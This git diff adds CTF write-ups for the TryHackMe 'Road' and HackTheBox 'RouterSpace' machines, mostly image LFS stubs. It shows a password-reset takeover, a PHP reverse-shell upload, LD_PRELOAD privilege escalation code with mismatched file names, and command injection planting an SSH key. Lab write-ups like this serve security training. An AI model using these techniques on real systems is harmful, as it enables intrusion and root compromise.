https://git-lfs.github.com/spec/v1 +oid sha256:c7e5c29785dca861e2ae23af8a3634340a573747ac1164b633dcb4df2e5ecfba +size 13372 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-2.png b/content/writeup-ctf/writeup-road-thm/img/image-2.png new file mode 100644 index 0000000..1bed912 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:965aaff72cd6aa7775228b92afe9f1d6b1d684ff233223bb599e62274a636931 +size 1179085 
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-2.webp b/content/writeup-ctf/writeup-road-thm/img/image-2.webp new file mode 100644 index 0000000..f8103af --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d423cefafba2d002641aaa7975fcf93e3a562746636d0e94d0c71f46e798fa12 +size 132978 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-3.png b/content/writeup-ctf/writeup-road-thm/img/image-3.png new file mode 100644 index 0000000..0ec3f00 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4968038694a5e4213e300c9100d1b54fc1c53f76426b4a6229bfd1ba5c9a884 +size 64618 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-3.webp b/content/writeup-ctf/writeup-road-thm/img/image-3.webp new file mode 100644 index 0000000..f1f10f0 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:daab3797cb6193d0fc1407e8a69c33b67e90e606f8023c4daddd2146a001bdc8 +size 53432 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-4.png b/content/writeup-ctf/writeup-road-thm/img/image-4.png new file mode 100644 index 0000000..31fe579 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0fee7577c6dc19e119c5fe68bf90297b03bf52169ed9c3abcffbf611b09cae9 +size 25270 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-4.webp b/content/writeup-ctf/writeup-road-thm/img/image-4.webp new file mode 100644 index 0000000..0f403fb --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:99a84dab7339cb7b3d93b62ec10ce2264a3e21e49d16d1b257cbbae4f59a3309 +size 6814 
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-5.png b/content/writeup-ctf/writeup-road-thm/img/image-5.png new file mode 100644 index 0000000..3c0cc63 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e04c590d21ad7896b36e01d1c0e71c44b9947c26800d574ae41f5dbd2b45b0fc +size 62289 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-5.webp b/content/writeup-ctf/writeup-road-thm/img/image-5.webp new file mode 100644 index 0000000..45c217c --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b764904f9e37f078c5d1e60ca150830fa5c9b80dd8cf52420474aa3e35d8a01a +size 30022 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-6.png b/content/writeup-ctf/writeup-road-thm/img/image-6.png new file mode 100644 index 0000000..52e92e1 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6feb257fa4ece9eb078560332eb5769975aae5dac06ed0ba012a05ec9502d34 +size 10381 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-6.webp b/content/writeup-ctf/writeup-road-thm/img/image-6.webp new file mode 100644 index 0000000..1e95b7c --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63628b790496e553fd617987f74765f870afbbbb1836619653e435e663337747 +size 5752 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-7.png b/content/writeup-ctf/writeup-road-thm/img/image-7.png new file mode 100644 index 0000000..d6080a4 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:de0bde92acb3398f1e1de9fa3f045f49e2b3580ac27e76f2d7968d932d7e060c +size 9186 
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-7.webp b/content/writeup-ctf/writeup-road-thm/img/image-7.webp new file mode 100644 index 0000000..ea2610a --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ca9693589d1cbbb54fa4fc4612977611d5511954e8933f4702bc3e5bfc5b166 +size 4558 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-8.png b/content/writeup-ctf/writeup-road-thm/img/image-8.png new file mode 100644 index 0000000..33d0f3d --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6dd1edddda21f4b5a4587df30ee9be172dabafce590b5519bc8b6b2d1b99210 +size 103517 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-8.webp b/content/writeup-ctf/writeup-road-thm/img/image-8.webp new file mode 100644 index 0000000..8e235bc --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4150697566fb5b165cf606ca5b792a82b84a9369e5247958962689ed3a53903b +size 95612 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-9.png b/content/writeup-ctf/writeup-road-thm/img/image-9.png new file mode 100644 index 0000000..5b43a4c --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9867ef55f9c6ac150b04bc4b1ec5e9291b9fff8d734b3f99edc0be2d9d318248 +size 14934 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-9.webp b/content/writeup-ctf/writeup-road-thm/img/image-9.webp new file mode 100644 index 0000000..ed1d2ab --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2101accbe72e0d962e84c45f82159086ade0b94a97374bde0f93dea00e6135a +size 5650 
diff --git a/content/writeup-ctf/writeup-road-thm/index.md b/content/writeup-ctf/writeup-road-thm/index.md new file mode 100644 index 0000000..8a9660c --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/index.md 
@@ -0,0 +1,155 @@ +--- +title: "Writeup - Road (THM)" +date: 2022-04-08 +slug: "writeup-road-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Road](https://tryhackme.com/room/road) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.57.115 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +I start with an enumeration of the files of the website. + +![](img/image-3.webp) + +I find a button on the basic site page that redirects to a login page. We have the possibility to create an account, I start by doing that. + +![](img/image-4.webp) + +Once the account is created, I log in and see the following page: + +![](img/image-5.webp) + +In the `edit profil` section you can't modify anything except the profile picture, but after looking closer, a message indicates that only the admins can do this action... Except that we learn an important information: the email of the admin! + +![](img/image-6.webp) + +After some research on the site, I find another page. This page allows you to change your password. I make a password change and capture the request sent to the server with Burp. + +![](img/image-7.webp) + +I realize that the email of the account is sent during the validation of the form, so I try to send the request but changing my email for the admin one. The server does not return any error, so I can connect to the admin account of the site! + +![](img/image-8.webp) + +Now that I'm admin, I can upload a new profile picture! 
+ +![](img/image-9.webp) + +So I create a PHP reverse shell with the following template: + +[php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shellContribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.![](https://github.com/fluidicon.png) + +{{< github repo="pentestmonkey/php-reverse-shell" >}} + +I upload my `reverse.php` file thanks to the profile image change form. No error during the upload, I just have to find where the file has been put on the server.. + +I look at the source code of the page to see if there would not be any information. I find the following comment: + +![](img/image-10.webp) + +So I go to the following address: + + +```bash +10.10.57.115/v2/profileimages/reverse.php +``` +![](img/image-11.webp) + +I now have a reverse shell and can recover the first flag. + + +```bash +$ cat /home/webdeveloper/user.txt +63191e4ece37523c9fe6bb62a5e64d45 +``` +## Privilege escalation + +I start by running [linPeas](https://linpeas.sh). In the result of the command I find that Mysql and MangoDB are running on the machine... + +I upgrade my shell with the following command: + + +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' +``` +Then I try to connect to MySQL without success, so I test with MongoDB : + +![](img/image-12.webp) + +I am now in Mongo, I list the databases with the following command: + +![](img/image-13.webp) + +After a little exploration, I find in the `backup` database a table `user` : + +![](img/image-14.webp) + +I can now connect via SSH to webdeveloper. I then check if this user has SUDO authorization: + +![](img/image-15.webp) + +The `webdeveloper` user can execute the `sky_backup_utility` with root rights. But the most interesting thing is the tag: `env_keep+=LD_PRELOAD`. 
+ +After some research I found this website: + +[Sudo (LD_PRELOAD) (Linux Privilege Escalation) – Touhid’s Blog](https://touhidshaikh.com/blog/2018/04/sudo-ld_preload-linux-privilege-escalation/) + +Overall, it explains that it is possible to execute code before the program and that with root execution rights. So I create a bash.c file with the following content : + + +```C +#include +#include +#include + +void _init() { +unsetenv("LD_PRELOAD"); +setgid(0); +setuid(0); +system("/bin/bash"); +} +``` +bash.cThen I compile it with the following command: + + +```bash +gcc -fPIC -shared -o evil.so evil.c -nostartfiles +``` +I can now run the program with sudo, without forgetting our code that will be executed at the beginning: + + +```bash +sudo LD_PRELOAD=/home/webdeveloper/bash.so sky_backup_utility +``` +![](img/image-16.webp) + +I now have a root shell so I can get the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Secured the password change page to prevent a user from changing the password of a user other than his own +- Set up a verification of the upload files to the server to avoid sending PHP code or other +- Do not store passwords in clear text in a database +- Secure access to databases +- Do not change SETUID bit of a program to avoid `LD_PRELOAD` exploit diff --git a/content/writeup-ctf/writeup-routerspace-htb/featured.png b/content/writeup-ctf/writeup-routerspace-htb/featured.png new file mode 100644 index 0000000..1ff5c95 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14c2606653260d2f723ec828c283aeb98a6d834e218ee3815372e24352557785 +size 298015 diff --git a/content/writeup-ctf/writeup-routerspace-htb/featured.webp b/content/writeup-ctf/writeup-routerspace-htb/featured.webp new file mode 100644 index 0000000..a0d4e3d --- /dev/null 
+++ b/content/writeup-ctf/writeup-routerspace-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ee69a0fd7b5eda7736af887f92317795e8df5aaa52bdf8bd6514620b27a4ba8 +size 27324 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-1.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.png new file mode 100644 index 0000000..a2d0261 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9128f3872a7b214ec4082218a5249a3f2875741e4e46a64f17cdf599bb0d7d2a +size 32095 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-1.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.webp new file mode 100644 index 0000000..ac2310f --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2ed89955d69df3de816797e2d1c5ac44b7844491a93a0ac9dd3039510fc4fc0 +size 24134 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-2.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.png new file mode 100644 index 0000000..74d26df --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:232f3e3c57ae61b1109ddc16c66692b3e1fb395b509561753a78ae0f42b47fb0 +size 351037 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-2.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.webp new file mode 100644 index 0000000..7002299 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:306456dbeb2880ee49114b28b0d98e9f5d1a6225ff10d47de454322ed1e038fa +size 64370 
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-3.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.png new file mode 100644 index 0000000..203ee62 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b321b993518d3c4d2eaf1ec1719c1ac235078580156aba3330b54cfb48f18725 +size 40450 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-3.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.webp new file mode 100644 index 0000000..eba97c5 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc032b528eb4c0d34a25ef1e9cf2747bde4a1beb1dad3d6b27d6f153ad6168ef +size 33076 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-4.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.png new file mode 100644 index 0000000..f837e14 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95386c180e625875e2b7858714242cfb8d2f0d238355cd3360e74dbbc6c47871 +size 35670 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-4.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.webp new file mode 100644 index 0000000..9e774ca --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42a0f23e173b1b214cbf82fabe10982516630a88c995bc4cc9b2678f38ee1766 +size 33494 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-5.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.png new file mode 100644 index 0000000..bcf1636 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cad33c99df2766d2ced1bd231e3da74c73b9efb7a3f1ad56033fe89c9054f685 +size 37242 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-5.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.webp new file mode 100644 index 0000000..69e9cfd --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5313aa7d3a9bc6a7bad664fb72258ed1f84b872927934e8fc2be32f3d9237d86 +size 35452 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-6.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.png new file mode 100644 index 0000000..d953858 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a95773c58f7306db639038041c8d6cdf1d01fb4e81488a6bc4df9f7db59e74d5 +size 80746 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-6.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.webp new file mode 100644 index 0000000..9acce79 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd35511688859c2f6b446299c961285f5d510ab2b4b360b88a6ca9db813796f0 +size 53744 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-7.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.png new file mode 100644 index 0000000..9127602 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03f01d7cea42fa374ef0f666d02fdff7abde117990b115f5545a4e97e77d361e +size 31588 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-7.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.webp new file mode 100644 index 0000000..b26ce74 --- /dev/null 
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af98b4d43dfe66f4296ae1341feb43d30871df57f247af4fe81304c75e5b1f1a +size 27352 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-8.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.png new file mode 100644 index 0000000..b21c096 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d5435e4c0f8263aa98c9b97701fe719530f626fc2d612f9fd6a5ed6f36c1001 +size 14402 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-8.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.webp new file mode 100644 index 0000000..8916350 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe6b9937a10d7a9e994ab5852a1b76c902434fb761212be0d5cad2710e8d16ba +size 13938 diff --git a/content/writeup-ctf/writeup-routerspace-htb/index.md b/content/writeup-ctf/writeup-routerspace-htb/index.md new file mode 100644 index 0000000..c8ac46f --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/index.md 
@@ -0,0 +1,134 @@ +--- +title: "Writeup - RouterSpace (HTB)" +date: 2022-04-05 +slug: "writeup-routerspace-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [RouterSpace](https://app.hackthebox.com/machines/RouterSpace) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.129.175.15 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port +- 80/tcp : HTTP web server + +Let's go to the site and see if we can find some information. + +![](img/image-2.webp) + +The site presents us with an application to connect our router to "routerspace". In addition to this information we have the possibility to download the application in .apk format. + +## Exploit + +I first tried to analyze the application with [APKtool](https://www.kali.org/tools/apktool/). But I didn't find anything special. So I will try to install it with the help of an emulator. + +After testing several emulation solutions, I finally chose Anbox. To install it on kali I followed the following guide: + +[How to install Anbox on Debian](https://dev.to/sbellone/how-to-install-anbox-on-debian-1hjd) + +After starting Anbox, I start Burp in listening mode on all interfaces, then I set adb with the burp proxy with the following command: + + +```bash +adb shell settings put global http_proxy 192.168.250.1:8080 +``` +I then install the application with the following command: + + +```bash +adb install RouterSpace.apk +``` +After starting the application and testing the connection, I notice that burp is intercepting packets to "". So I add this domain to the "/etc/hosts" file. + +![](img/image-3.webp) + +While analyzing the packet sent by the application I notice a json IP field. + +![](img/image-4.webp) + +By adding ";" I can insert a command that the remote host interprets as a command. Perfect! 
+ +After some tests I realize that I can't launch a reverse shell, possibly there are firewall rules that block. To be confirmed... + +Another solution is to use SSH to get access. I check if there is a '.ssh' folder for the user paul : + +![](img/image-5.webp) + +It exists, so I generate keys: + + +```bash +┌──(kali㉿kali)-[~] +└─$ ssh-keygen +Generating public/private rsa key pair. +Enter file in which to save the key (/home/kali/.ssh/id_rsa): +Enter passphrase (empty for no passphrase): +Enter same passphrase again: +Your identification has been saved in /home/kali/.ssh/id_rsa +Your public key has been saved in /home/kali/.ssh/id_rsa.pub +The key fingerprint is: +SHA256:UbAb/Eaflsqf/Wneee+yy26b+ZymMNXYfXH7oxac8/E kali@kali +The key's randomart image is: ++---[RSA 3072]----+ +| ... | +| . o | +| = . ..| +| * . o+ =| +| S o *o.+o| +| o o.= .o| +| oo +.+| +| .o=+BE| +| +=#&X| ++----[SHA256]-----+ +``` +Then I add my public key in the "authorized\_jeys" file with the following command: + + +```bash +"ip":";echo 'ssh-rsa [public_key] kali@kali'>> ~/.ssh/authorized_keys" +``` +I can now connect in SSH and get the first flag. + +![](img/image-6.webp) + +## Privilege escalation + +To start I'll use [linPeas](https://linpeas.sh/) to do a first exploit tracking on the machine. But I have indeed the impression that IPtables rules are blocking my requests: + +![](img/image-7.webp) + +To transfer my file I will use "scp" with the following command: + + +```bash +┌──(kali㉿kali)-[~] +└─$ scp linpeas.sh paul@10.10.11.148:~/ +linpeas.sh 100% 748KB 8.4MB/s 00:00 +``` +After running the script, I notice that the machine uses a version of sudo that is exploitable (CVE-2021-3156). After some research I find this script which allows to create a root shell: + +[GitHub - mohinparamasivam/Sudo-1.8.31-Root-Exploit: Root shell PoC for CVE-2021-3156Root shell PoC for CVE-2021-3156. 
Contribute to mohinparamasivam/Sudo-1.8.31-Root-Exploit development by creating an account on GitHub.![](https://github.com/fluidicon.png) + +{{< github repo="mohinparamasivam/Sudo-1.8.31-Root-Exploit" >}} + +And indeed after executing the code, I get a root shell and I can recover the last flag! + +![](img/image-8.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Secure the application to avoid code injection +- Run the service with a user who does not have SSH access +- Update the sudo version to a more secure one diff --git a/content/writeup-ctf/writeup-secret-htb/featured.png b/content/writeup-ctf/writeup-secret-htb/featured.png new file mode 100644 index 0000000..590df71 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:999eddadf8957078c856528e1418e1b4b61adb4b3cf1d42af4371297f9218838 +size 260739 diff --git a/content/writeup-ctf/writeup-secret-htb/featured.webp b/content/writeup-ctf/writeup-secret-htb/featured.webp new file mode 100644 index 0000000..8744360 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1da839f06f75dff39cc0af1a401c6f2d64dd42a879c272aa59fb307164aff01d +size 25298 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-1.png b/content/writeup-ctf/writeup-secret-htb/img/image-1.png new file mode 100644 index 0000000..34cc89e --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c804133308ad229333445030cb84b8d6931bf69e64daace8ad6885ad0c419c4 +size 56700 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-1.webp b/content/writeup-ctf/writeup-secret-htb/img/image-1.webp new file mode 100644 index 0000000..5797b13 --- /dev/null 
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea45ff2eca301e6a9c5e4016b1e2751623196b55c14badfebea31dc6461a84c2 +size 47746 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-10.png b/content/writeup-ctf/writeup-secret-htb/img/image-10.png new file mode 100644 index 0000000..7831efe --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c66741ac71b1471909e2a87a247c0988f25e18a8be20b4a8aebaef783e222994 +size 48565 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-10.webp b/content/writeup-ctf/writeup-secret-htb/img/image-10.webp new file mode 100644 index 0000000..25116ca --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:124e6754b4192d217eb7320d4d73d09d621cf7bdd0de6b1cd239bf4f34421b5f +size 32370 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-11.png b/content/writeup-ctf/writeup-secret-htb/img/image-11.png new file mode 100644 index 0000000..5e4fd05 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:184043d432e82c103a8f236ed8635ea63523637d76d7e72208ae29531d0b3621 +size 23449 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-11.webp b/content/writeup-ctf/writeup-secret-htb/img/image-11.webp new file mode 100644 index 0000000..adbe89a --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e07f644154184ca9ef2ca9c192fb3798189dbf7f5828b6838963e7945c4dc86 +size 20576 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-12.png b/content/writeup-ctf/writeup-secret-htb/img/image-12.png new file mode 100644 index 0000000..7e6e4d6 --- /dev/null 
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82d3de6689942f876b8dff4a07bad0200b92d70e4ca6087a177d82a5433c154e +size 26107 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-12.webp b/content/writeup-ctf/writeup-secret-htb/img/image-12.webp new file mode 100644 index 0000000..dd0a4c3 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cebbaec44698bd9bb0d95dc2e5c4de9e095b6fe129a50bd0381ffff0e4c10711 +size 21560 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-13.png b/content/writeup-ctf/writeup-secret-htb/img/image-13.png new file mode 100644 index 0000000..f45d584 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad02150cb49ed0aeff704d9cd64a502486d6680d59d47cbe8eaaa7a13efa0a58 +size 24842 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-13.webp b/content/writeup-ctf/writeup-secret-htb/img/image-13.webp new file mode 100644 index 0000000..6152394 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:08e3d2687ba475f8e0f12dcf50e2f708a33613081a8a515cfb1efd6ad5afe096 +size 20038 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-14.png b/content/writeup-ctf/writeup-secret-htb/img/image-14.png new file mode 100644 index 0000000..5e9854e --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65e5556b139b352bfe7309b02159a955770effebb1adc0be7e6296529a812023 +size 46471 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-14.webp b/content/writeup-ctf/writeup-secret-htb/img/image-14.webp new file mode 100644 index 0000000..2e8764f --- /dev/null 
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73c7a6535acdd46e8970ff4834d717077d68225ca0b9214a95798bfb06de2119 +size 35754 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-15.png b/content/writeup-ctf/writeup-secret-htb/img/image-15.png new file mode 100644 index 0000000..d85e7f9 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a9f097c2a9174a6f75582d11f9bdaa378a8fa7ddf3c19119efea682af484add +size 57864 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-15.webp b/content/writeup-ctf/writeup-secret-htb/img/image-15.webp new file mode 100644 index 0000000..5e727de --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e213ec4faba2790b72031ed896ecd7d048e21712a500b5aa7722275720f8fbfd +size 60240 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-2.png b/content/writeup-ctf/writeup-secret-htb/img/image-2.png new file mode 100644 index 0000000..9d6af2f --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbc876ee83e7952cefe17fec1db6e74ddecc36192aefcae12874099ae4c41e15 +size 193060 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-2.webp b/content/writeup-ctf/writeup-secret-htb/img/image-2.webp new file mode 100644 index 0000000..808cb95 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 